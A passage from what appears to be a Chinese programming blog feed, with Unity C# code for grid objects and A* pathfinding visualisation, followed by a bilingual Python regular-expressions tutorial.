    grid = new Grid<HeatMapGridObject>(4, 2, 10f, new Vector3(20, 0), (Grid<HeatMapGridObject> g, int x, int y) => new HeatMapGridObject(g, x, y));
    }

    private void Update()
    {
    if (Input.GetMouseButtonDown(0))
    {
    Vector3 position = UtilsClass.GetMouseWorldPosition();
    HeatMapGridObject heatMapGridObject = grid.GetGridObject(position);
    if (heatMapGridObject != null)
    {
    heatMapGridObject.AddValue(5);
    }
    }
    }

    public class HeatMapGridObject
    {
    private const int MIN = 0;
    private const int MAX = 100;

    private Grid<HeatMapGridObject> grid;
    private int x;
    private int y;
    private int value;

    public HeatMapGridObject(Grid<HeatMapGridObject> grid, int x, int y)
    {
    this.grid = grid;
    this.x = x;
    this.y = y;
    }

    public void AddValue(int addValue)
    {
    value += addValue;
    Mathf.Clamp(value, MIN, MAX);
    grid.TriggerGridObjectChanged(x, y);
    }

    public float GetValueNormalized()
    {
    return (float)value / MAX;
    }

    public override string ToString()
    {
    return value.ToString();
    }
    }
    }

    运行效果:

    png

    设计并使用 StringGridObject 类

    设计并使用 StringGridObject 类的完整 Testing.cs 代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    using UnityEngine;
    using CodeMonkey.Utils;

    public class Testing : MonoBehaviour
    {
    private Grid<StringGridObject> stringGrid;
    // Start is called before the first frame update
    void Start()
    {
    stringGrid = new Grid<StringGridObject>(4, 2, 10f, new Vector3(20, 0), (Grid<StringGridObject> g, int x, int y) => new StringGridObject(g, x, y));
    }

    private void Update()
    {
    Vector3 position = UtilsClass.GetMouseWorldPosition();
    if (Input.GetKeyDown(KeyCode.A)) { stringGrid.GetGridObject(position).AddLetter("A"); }
    if (Input.GetKeyDown(KeyCode.B)) { stringGrid.GetGridObject(position).AddLetter("B"); }
    if (Input.GetKeyDown(KeyCode.C)) { stringGrid.GetGridObject(position).AddLetter("C"); }

    if (Input.GetKeyDown(KeyCode.Alpha1)) { stringGrid.GetGridObject(position).AddNumber("1"); }
    if (Input.GetKeyDown(KeyCode.Alpha2)) { stringGrid.GetGridObject(position).AddNumber("2"); }
    if (Input.GetKeyDown(KeyCode.Alpha3)) { stringGrid.GetGridObject(position).AddNumber("3"); }
    }

    public class StringGridObject
    {
    private Grid<StringGridObject> grid;
    private int x;
    private int y;

    public string letters;
    public string numbers;

    public StringGridObject(Grid<StringGridObject> grid, int x, int y)
    {
    this.grid = grid;
    this.x = x;
    this.y = y;
    letters = "";
    numbers = "";
    }

    public void AddLetter(string letter)
    {
    letters += letter;
    grid.TriggerGridObjectChanged(x, y);
    }

    public void AddNumber(string number)
    {
    numbers += number;
    grid.TriggerGridObjectChanged(x, y);
    }

    public override string ToString()
    {
    return letters + "\n" + numbers;
    }
    }
    }

    运行效果:

    png

    AStar 算法

    A* Pathfinding in Unity

    这篇的代码量还真是大…直接抄吧

    场景对象布局

    png

    CharacterPathfindingMovementHandler 控制人物行走

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    using System.Collections.Generic;
    using UnityEngine;
    using V_AnimationSystem;
    using CodeMonkey.Utils;

    public class CharacterPathfindingMovementHandler : MonoBehaviour {

    private const float speed = 40f;

    private V_UnitSkeleton unitSkeleton;
    private V_UnitAnimation unitAnimation;
    private AnimatedWalker animatedWalker;
    private int currentPathIndex;
    private List<Vector3> pathVectorList;


    private void Start() {
    Transform bodyTransform = transform.Find("Body");
    unitSkeleton = new V_UnitSkeleton(1f, bodyTransform.TransformPoint, (Mesh mesh) => bodyTransform.GetComponent<MeshFilter>().mesh = mesh);
    unitAnimation = new V_UnitAnimation(unitSkeleton);
    animatedWalker = new AnimatedWalker(unitAnimation, UnitAnimType.GetUnitAnimType("dMarine_Idle"), UnitAnimType.GetUnitAnimType("dMarine_Walk"), 1f, 1f);
    }

    private void Update() {
    HandleMovement();
    unitSkeleton.Update(Time.deltaTime);

    if (Input.GetMouseButtonDown(0)) {
    SetTargetPosition(UtilsClass.GetMouseWorldPosition());
    }
    }

    private void HandleMovement() {
    if (pathVectorList != null) {
    Vector3 targetPosition = pathVectorList[currentPathIndex];
    if (Vector3.Distance(transform.position, targetPosition) > 1f) {
    Vector3moveDir = (targetPosition - transform.position).normalized;

    float distanceBefore = Vector3.Distance(transform.position, targetPosition);
    animatedWalker.SetMoveVector(moveDir);
    transform.position = transform.position + moveDir * speed * Time.deltaTime;
    } else {
    currentPathIndex++;
    if (currentPathIndex >= pathVectorList.Count) {
    StopMoving();
    animatedWalker.SetMoveVector(Vector3.zero);
    }
    }
    } else {
    animatedWalker.SetMoveVector(Vector3.zero);
    }
    }

    private void StopMoving() {
    pathVectorList = null;
    }

    public Vector3 GetPosition() {
    return transform.position;
    }

    public void SetTargetPosition(Vector3 targetPosition) {
    currentPathIndex = 0;
    pathVectorList = Pathfinding.Instance.FindPath(GetPosition(), targetPosition);

    if (pathVectorList != null && pathVectorList.Count > 1) {
    pathVectorList.RemoveAt(0);
    }
    }
    }

    PathfindingDebugStepVisual 界面可视化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using TMPro;
    using CodeMonkey.Utils;

    public class PathfindingDebugStepVisual : MonoBehaviour {
    public static PathfindingDebugStepVisual Instance { get; private set; }
    [SerializeField] private Transform pfPathfindingDebugStepVisualNode;
    private List<Transform> visualNodeList;
    private List<GridSnapshotAction> gridSnapshotActionList;
    private bool autoShowSnapshots;
    private float autoShowSnapshotsTimer;
    private Transform[,] visualNodeArray;
    private void Awake() {
    Instance = this;
    visualNodeList = new List<Transform>();
    gridSnapshotActionList = new List<GridSnapshotAction>();
    }
    public void Setup(Grid<PathNode> grid) {
    visualNodeArray = new Transform[grid.GetWidth(), grid.GetHeight()];

    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    Vector3gridPosition = new Vector3(x, y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    Transform visualNode = CreateVisualNode(gridPosition);
    visualNodeArray[x, y] = visualNode;
    visualNodeList.Add(visualNode);
    }
    }
    HideNodeVisuals();
    }
    private void Update() {
    if (Input.GetKeyDown(KeyCode.Space)) {
    ShowNextSnapshot();
    }

    if (Input.GetKeyDown(KeyCode.Return)) {
    autoShowSnapshots = true;
    }
    if (autoShowSnapshots) {
    float autoShowSnapshotsTimerMax = .05f;
    autoShowSnapshotsTimer -= Time.deltaTime;
    if (autoShowSnapshotsTimer <= 0f) {
    autoShowSnapshotsTimer += autoShowSnapshotsTimerMax;
    ShowNextSnapshot();
    if (gridSnapshotActionList.Count == 0) {
    autoShowSnapshots = false;
    }
    }
    }
    }
    private void ShowNextSnapshot() {
    if (gridSnapshotActionList.Count > 0) {
    GridSnapshotAction gridSnapshotAction = gridSnapshotActionList[0];
    gridSnapshotActionList.RemoveAt(0);
    gridSnapshotAction.TriggerAction();
    }
    }
    public void ClearSnapshots() {
    gridSnapshotActionList.Clear();
    }
    public void TakeSnapshot(Grid<PathNode> grid, PathNode current, List<PathNode> openList, List<PathNode> closedList) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isCurrent = pathNode == current;
    bool isInOpenList = openList.Contains(pathNode);
    bool isInClosedList = closedList.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor = UtilsClass.GetColorFromString("636363");
    if (isInClosedList) {
    backgroundColor = new Color(1, 0, 0);
    }
    if (isInOpenList) {
    backgroundColor = UtilsClass.GetColorFromString("009AFF");
    }
    if (isCurrent) {
    backgroundColor = new Color(0, 1, 0);
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    public void TakeSnapshotFinalPath(Grid<PathNode> grid, List<PathNode> path) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isInPath = path.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor;
    if (isInPath) {
    backgroundColor = new Color(0, 1, 0);
    } else {
    backgroundColor = UtilsClass.GetColorFromString("636363");
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    private void HideNodeVisuals() {
    foreach (Transform visualNodeTransform in visualNodeList) {
    SetupVisualNode(visualNodeTransform, 9999, 9999, 9999);
    }
    }
    private Transform CreateVisualNode(Vector3 position) {
    Transform visualNodeTransform = Instantiate(pfPathfindingDebugStepVisualNode, position, Quaternion.identity);
    return visualNodeTransform;
    }
    private void SetupVisualNode(Transform visualNodeTransform, int gCost, int hCost, int fCost) {
    if (fCost < 1000) {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText(gCost.ToString());
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText(hCost.ToString());
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText(fCost.ToString());
    } else {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText("");
    }
    }
    private class GridSnapshotAction {
    private Action action;
    public GridSnapshotAction() {
    action = () => { };
    }
    public void AddAction(Action action) {
    this.action += action;
    }
    public void TriggerAction() {
    action();
    }
    }
    }

    PathfindingDebugStepVisual 算法步骤可视化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using TMPro;
    using CodeMonkey.Utils;

    public class PathfindingDebugStepVisual : MonoBehaviour {
    public static PathfindingDebugStepVisual Instance { get; private set; }
    [SerializeField] private Transform pfPathfindingDebugStepVisualNode;
    private List<Transform> visualNodeList;
    private List<GridSnapshotAction> gridSnapshotActionList;
    private bool autoShowSnapshots;
    private float autoShowSnapshotsTimer;
    private Transform[,] visualNodeArray;
    private void Awake() {
    Instance = this;
    visualNodeList = new List<Transform>();
    gridSnapshotActionList = new List<GridSnapshotAction>();
    }
    public void Setup(Grid<PathNode> grid) {
    visualNodeArray = new Transform[grid.GetWidth(), grid.GetHeight()];
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    Vector3gridPosition = new Vector3(x, y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    Transform visualNode = CreateVisualNode(gridPosition);
    visualNodeArray[x, y] = visualNode;
    visualNodeList.Add(visualNode);
    }
    }
    HideNodeVisuals();
    }
    private void Update() {
    if (Input.GetKeyDown(KeyCode.Space)) {
    ShowNextSnapshot();
    }
    if (Input.GetKeyDown(KeyCode.Return)) {
    autoShowSnapshots = true;
    }
    if (autoShowSnapshots) {
    float autoShowSnapshotsTimerMax = .05f;
    autoShowSnapshotsTimer -= Time.deltaTime;
    if (autoShowSnapshotsTimer <= 0f) {
    autoShowSnapshotsTimer += autoShowSnapshotsTimerMax;
    ShowNextSnapshot();
    if (gridSnapshotActionList.Count == 0) {
    autoShowSnapshots = false;
    }
    }
    }
    }
    private void ShowNextSnapshot() {
    if (gridSnapshotActionList.Count > 0) {
    GridSnapshotAction gridSnapshotAction = gridSnapshotActionList[0];
    gridSnapshotActionList.RemoveAt(0);
    gridSnapshotAction.TriggerAction();
    }
    }
    public void ClearSnapshots() {
    gridSnapshotActionList.Clear();
    }
    public void TakeSnapshot(Grid<PathNode> grid, PathNode current, List<PathNode> openList, List<PathNode> closedList) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isCurrent = pathNode == current;
    bool isInOpenList = openList.Contains(pathNode);
    bool isInClosedList = closedList.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor = UtilsClass.GetColorFromString("636363");

    if (isInClosedList) {
    backgroundColor = new Color(1, 0, 0);
    }
    if (isInOpenList) {
    backgroundColor = UtilsClass.GetColorFromString("009AFF");
    }
    if (isCurrent) {
    backgroundColor = new Color(0, 1, 0);
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    public void TakeSnapshotFinalPath(Grid<PathNode> grid, List<PathNode> path) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isInPath = path.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor;
    if (isInPath) {
    backgroundColor = new Color(0, 1, 0);
    } else {
    backgroundColor = UtilsClass.GetColorFromString("636363");
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    private void HideNodeVisuals() {
    foreach (Transform visualNodeTransform in visualNodeList) {
    SetupVisualNode(visualNodeTransform, 9999, 9999, 9999);
    }
    }
    private Transform CreateVisualNode(Vector3 position) {
    Transform visualNodeTransform = Instantiate(pfPathfindingDebugStepVisualNode, position, Quaternion.identity);
    return visualNodeTransform;
    }
    private void SetupVisualNode(Transform visualNodeTransform, int gCost, int hCost, int fCost) {
    if (fCost < 1000) {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText(gCost.ToString());
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText(hCost.ToString());
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText(fCost.ToString());
    } else {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText("");
    }
    }
    private class GridSnapshotAction {
    private Action action;
    public GridSnapshotAction() {
    action = () => { };
    }
    public void AddAction(Action action) {
    this.action += action;
    }
    public void TriggerAction() {
    action();
    }
    }
    }

    Testing.cs

    Testing.cs 源代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    using System.Collections.Generic;
    using UnityEngine;
    using CodeMonkey.Utils;
    using CodeMonkey;

    public class Testing : MonoBehaviour {

    [SerializeField] private PathfindingDebugStepVisual pathfindingDebugStepVisual;
    [SerializeField] private PathfindingVisual pathfindingVisual;
    [SerializeField] private CharacterPathfindingMovementHandler characterPathfinding;
    private Pathfinding pathfinding;

    private void Start() {
    pathfinding = new Pathfinding(20, 10);
    pathfindingDebugStepVisual.Setup(pathfinding.GetGrid());
    pathfindingVisual.SetGrid(pathfinding.GetGrid());
    }

    private void Update() {
    if (Input.GetMouseButtonDown(0)) {
    Vector3mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    List<PathNode> path = pathfinding.FindPath(0, 0, x, y);
    if (path != null) {
    for (int i=0; i<path.Count - 1; i++) {
    Debug.DrawLine(new Vector3(path[i].x, path[i].y) * 10f + Vector3.one * 5f, new Vector3(path[i+1].x, path[i+1].y) * 10f + Vector3.one * 5f, Color.green, 5f);
    }
    }
    characterPathfinding.SetTargetPosition(mouseWorldPosition);
    }

    if (Input.GetMouseButtonDown(1)) {
    Vector3mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    pathfinding.GetNode(x, y).SetIsWalkable(!pathfinding.GetNode(x, y).isWalkable);
    }
    }

    }
    ]]>
    @@ -9300,7 +9300,7 @@ /posts/Python-Regular%20Expressions%20made%20Easy/ - 资源
    • Python Regular Expressions - part #1 - YouTube

    • Regular Expressions are used to match string patterns. 正则表达式用于匹配字符串模式。

      • They are very powerful 它们非常强大

      • If you want to pull out a string pattern RE can do it 如果你想拉出一个字符串模式正则可以做到

      • They may seem intimidating 他们可能看起来很吓人

    课程

    Things to note

    • The first thing I want start off with is the the back slash character

      • 我想要开始的第一件事是反斜杠字符
    • Very confusing to people

      • 很让人困惑
    • Python uses back slash to indicate special characters

      • Python 使用反斜杠表示特殊字符
    • '\n' Backslash followed by n denotes a newline

      • 反斜杠后面加 n 表示换行符
    • '\t' denotes a tab

      • ‘\t’ 表示制表符
    • 'r' expression, that voids the Python’s special characters

      • 'r’表达式,将使 Python 的特殊字符无效
    • r'\n' means it’s a raw string with two characters ‘n’ and ‘' as opposed to just one special character’

      • r’\n’表示它是一个有两个字符’n’和’'的原始字符串而不是只有一个特殊字符’
    • Let’s see some examples of this dont mind the python syntax

      • 让我们看一些这样的例子,不要介意 python 语法

    python 正则表达式 re.search()怎么使用?

    re.search(pattern, string, flags =0)

    import re
    re.search('n', '\n') # first item is pattern, second item is string
    # two ways to handle this one way is to use \ for every backslash
    # 有两种处理方法,一种方法是对每个反斜杠使用\ (另一种是在前面加 r)
    re.search('n', '\\n')
    <re.Match object; span=(1, 2), match='n'>
    # not the best way if we have too many \s
    # 如果我们有太多的\,这不是最好的方法
    re.search('n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    # r converts to raw string
    # r 转换为原始字符串
    re.search('n', r'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(1, 2), match='n'>
    """
    there are some nuances that you should be aware of regular expressions
    has its own special characters as well regex with '\n' and r'\n' both
    look for newline.
    你应该注意到一些细微的差别,正则表达式也有自己的特殊字符,
    带有'\n'和 r'\n'的正则表达式都查找换行符
    """
    re.search('\n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(0, 1), match='\n'>
    # this works as well because r'\n' also looks for new line
    # 同样有效,因为 pattern 中 r'\n' 也会查找新行
    re.search(r'\n', '\n\n')
    <re.Match object; span=(0, 1), match='\n'>
    # doesn't work because string doesn't use newline and r'\n' looks for newline
    # 不能工作,因为 string 不使用换行符,而 pattern 中 r'\n'查找换行符
    re.search(r'\n', r'\n\n')

    MATCH and SEARCH EXAMPLES

    REs common methods - Match and Search

    • searches anywhere in the sentence 搜索句子中的任何位置
    • flags: special options 标志:特殊选项

    re.search(pattern, string, flags)

    • only beginning of the string 只搜索字符串的开始

    re.match(pattern, string, flags)

    # returns none because only looks at the start of string
    # 返回 none,因为只查看字符串的开头
    re.match("c", "abcdef")
    re.search("c", "abcdef")  # searches anywhere
    <re.Match object; span=(2, 3), match='c'>
    bool(re.match("c", "abcdef"))  # no match returns boolean false
    False
    bool(re.match("a", "abcdef"))  # match returns true
    True
    # tells you where it matched first and only first
    # 告诉你它首先匹配的位置
    re.search("c", "abcdef")
    <re.Match object; span=(2, 3), match='c'>
    re.search("c", "abcdefc")  # multiple 'c's first instance only 返回多个 c 的第一个实例
    <re.Match object; span=(2, 3), match='c'>
    re.search("c", "abdef\nc")  # multiline works with search 多行与搜索一起工作
    <re.Match object; span=(6, 7), match='c'>
    re.match("c", "\nc")  # match doesn't work with newline 匹配对换行符无效
    (re.match("a", "abcdef"))  # match objects
    <re.Match object; span=(0, 1), match='a'>

    python 正则匹配中 re.match().group(num=0)

    re.match("a", "abcdef").group()  # string output # defautlt value is 0 默认值为 0 
    'a'
    re.match("a", "abcdef").group(0)  
    'a'
    re.search("n", "abcdefnc abcd").group()
    'n'
    re.search('n.+', "abcdefnc abcd").group()  # pull out different types of strings 拿出不同类型的字符串
    # depending on the wildcards you use 这取决于您使用的通配符
    'nc abcd'

    python 正则(2)group/start/end/span 方法

    re.search("c", "abdef\nc").start()
    6
    re.search("c", "abdef\nc").end()
    7

    Literal matching

    re.search('na',"abcdefnc abcd" )  # doesn't work, because they are ordered 无效,因为它们是有序的
    re.search('n|a',"abcdefnc abcda" )  # n or a
    <re.Match object; span=(0, 1), match='a'>
    re.search('n|a',"bcdefnc abcda" )  # replaced the a with b, first match is an n
    <re.Match object; span=(5, 6), match='n'>
    re.search('n|a|b',"bcdefnc abcda" ) # as many OR expressions
    <re.Match object; span=(0, 1), match='b'>

    re.findall

    re.findall('n|a',"bcdefnc abcda" ) # find all pulls out all instances 取出所有实例
    ['n', 'a', 'a']
    re.search('abcd',"abcdefnc abcd" ) # multiple characters - literal search 多字符-文字搜索
    <re.Match object; span=(0, 4), match='abcd'>
    re.findall('abcd',"abcdefnc abcd" ) 
    ['abcd', 'abcd']

    CHARACTER SETS

    • Character sets can match a set of characters
      • 简化正则表达式
    import re
    re.search('abcd',"abcdefnc abcd" ) # earlier code 之前的代码
    <re.Match object; span=(0, 4), match='abcd'>
    re.search(r'\w\w\w\w',"abcdefnc abcd" )  # matches characters and numbers 匹配字符和数字
    # alpha numeric characters
    <re.Match object; span=(0, 4), match='abcd'>

    \w matches alpha numeric characters [a-zA-Z0-9_]

    re.search(r'\w\w\w\w',"ab_cdefnc abcd" )  # matches _ character 匹配_字符
    <re.Match object; span=(0, 4), match='ab_c'>
    re.search(r'\w\w\w', "a3.!-!")  # doesn't match symbols only numbers and characters 不匹配符号,只匹配数字和字符
    re.search(r'\w\w\w', "a33-_!") .group()
    'a33'

    \W opposite of \w ;

    so nothing included in [a-zA-Z0-9_]

    re.search(r'\w\w\W', "a3.-_!")  # \W matches non characters and numbers
    # \W 匹配非字符和数字
    <re.Match object; span=(0, 3), match='a3.'>
    re.search(r'\w\w\W', "a3 .-_!")  # matches empty space as well 
    # \W 也可以匹配空格
    <re.Match object; span=(0, 3), match='a3 '>

    We will go over other character sets later on

    Let’s go over quantifiers’

    • quantifiers
      • '+' = 1 or more
      • '?' = 0 or 1
      • '*' = 0 or more
      • '{n,m}' = n to m repetitions {,3}, {3,}
    re.search(r'\w\w',"abcdefnc abcd" )
    <re.Match object; span=(0, 2), match='ab'>
    re.search(r'\w+',"abcdefnc abcd" ).group()  # don't know the numbers of letters 不知道单词的字母个数
    'abcdefnc'
    re.search(r'\w+\W+\w+',"abcdefnc abcd").group()
    'abcdefnc abcd'
    re.search('\w+\W+\w+',"abcdefnc       abcd").group()  # added spaces
    'abcdefnc       abcd'
    re.search(r'\w+\W?\w+',"abcdefnabcd").group()  # ? = 0 or 1 instances
    'abcdefnabcd'
    re.search(r'\w+\W?\w+',"abcde fnabcd").group()
    'abcde fnabcd'
    re.search(r'\w+\W+\w+', "abcdefnabcd")
    • Pulling out specific amounts
      • 取出特定数量
    re.search(r'\w{3}', 'aaaaaaaaaaa')  # only 3 \w characters
    <re.Match object; span=(0, 3), match='aaa'>
    re.search(r'\w{1,4}', 'aaaaaaaaaaa').group()  #1 is min, 4 is max
    'aaaa'
    re.search(r'\w{1,10}\W{0,4}\w+',"abcdefnc abcd").group()
    # 1-10 \w characters,
    # 0-4 \W chracters,
    # 1+ \w characters
    'abcdefnc abcd'
    re.search(r'\w{1,}\W{0,}\w+',"abcdefnc abcd").group() #at least 1, at least 0, 1+
    'abcdefnc abcd'

    Other types of characters sets

    '\d' = matches digits [0-9]

    '\D' = matches This matches any non-digit character; ~\d

    import re
    string = '23abced++'
    re.search('\d+', string).group()
    '23'

    '\s' = matches any whitespace character, new lines, tabs, spaces etc 匹配任何空白字符,新行,制表符,空格等

    '\S' = matches any non-whitespace chracter : ~\s 匹配任何非空格字符:~\s

    string = '23abced++'
    re.search('\S+', string).group() # no spaces
    '23abced++'
    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings.
    Elliot Hawkes of the University of California in Santa Barbara
    and his colleagues designed a bot that works
    on similar principles. Its mechanical body
    sits inside a plastic tube reel that extends
    through pressurized inflation, a method that some
    invertebrates like peanut worms (Sipunculus nudus)
    also use to extend their appendages. The plastic
    tubing has two compartments, and inflating one
    side or the other changes the extension direction.
    A camera sensor at the tip alerts the bot when it’s
    about to run into something.

    In the lab, Hawkes and his colleagues
    programmed the robot to form 3-D structures such
    as a radio antenna, turn off a valve, navigate a maze,
    swim through glue, act as a fire extinguisher, squeeze
    through tight gaps, shimmy through fly paper and slither
    across a bed of nails. The soft bot can extend up to
    72meters, and unlike plants, it can grow at a speed of
    10meters per second, the team reports July 19 in Science Robotics.
    The design could serve as a model for building robots
    that can traverse constrained environments

    This isn’t the first robot to take
    inspiration from plants. One plantlike
    predecessor was a robot modeled on roots.'''
    (re.findall('\S+', string))  # 返回 string 中所有的单词
